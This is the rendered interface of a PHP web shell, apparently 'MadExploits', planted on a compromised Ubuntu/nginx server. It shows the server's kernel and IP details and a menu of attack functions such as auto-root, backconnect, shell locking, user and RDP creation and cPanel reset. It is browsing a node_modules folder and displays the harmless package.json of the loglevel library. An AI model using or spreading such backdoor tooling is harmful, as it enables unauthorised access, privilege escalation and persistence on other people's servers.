Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
loglevel /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.editorconfig
387
B
-rw-r--r--
.jshintrc
210
B
-rw-r--r--
.npmignore
188
B
-rw-r--r--
.travis.yml
68
B
-rw-r--r--
CONTRIBUTING.md
3.66
KB
-rw-r--r--
Gruntfile.js
8.52
KB
-rw-r--r--
LICENSE-MIT
1.05
KB
-rw-r--r--
README.md
19.17
KB
-rw-r--r--
_config.yml
27
B
-rw-r--r--
bower.json
172
B
-rw-r--r--
package.json
1.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "loglevel", "description": "Minimal lightweight logging for JavaScript, adding reliable log level methods to any available console.log methods", "version": "1.6.1", "homepage": "https://github.com/pimterry/loglevel", "author": { "name": "Tim Perry", "email": "pimterry@gmail.com", "url": "http://tim-perry.co.uk" }, "repository": { "type": "git", "url": "git://github.com/pimterry/loglevel.git" }, "bugs": { "url": "https://github.com/pimterry/loglevel/issues" }, "license": "MIT", "main": "lib/loglevel", "engines": { "node": ">= 0.6.0" }, "scripts": { "test": "grunt test", "ci": "grunt ci", "dist": "grunt dist", "watch": "grunt watch" }, "dependencies": {}, "devDependencies": { "grunt": "~0.4.5", "grunt-cli": "~0.1.13", "grunt-contrib-clean": "^0.6.0", "grunt-contrib-concat": "~0.5.0", "grunt-contrib-connect": "~0.8.0", "grunt-contrib-jasmine": "~0.5.2", "grunt-contrib-jshint": "^1.1.0", "grunt-contrib-qunit": "~0.5.2", "grunt-contrib-uglify": "~0.5.1", "grunt-contrib-watch": "~0.6.1", "grunt-coveralls": "^1.0.0", "grunt-jasmine-node": "~0.2.1", "grunt-open": "~0.2.3", "grunt-preprocess": "^4.0.0", "grunt-saucelabs": "^8.2.0", "grunt-template-jasmine-istanbul": "~0.2.5", "grunt-template-jasmine-requirejs": "~0.1.6", "qunitjs": "1.14.0" }, "keywords": [ "log", "logger", "logging", "browser" ] ,"_resolved": "https://registry.npmjs.org/loglevel/-/loglevel-1.6.1.tgz" ,"_integrity": "sha1-4PyVEztu8nbNyIh82vJKpvFW+Po=" ,"_from": "loglevel@^1.6.1" }
Close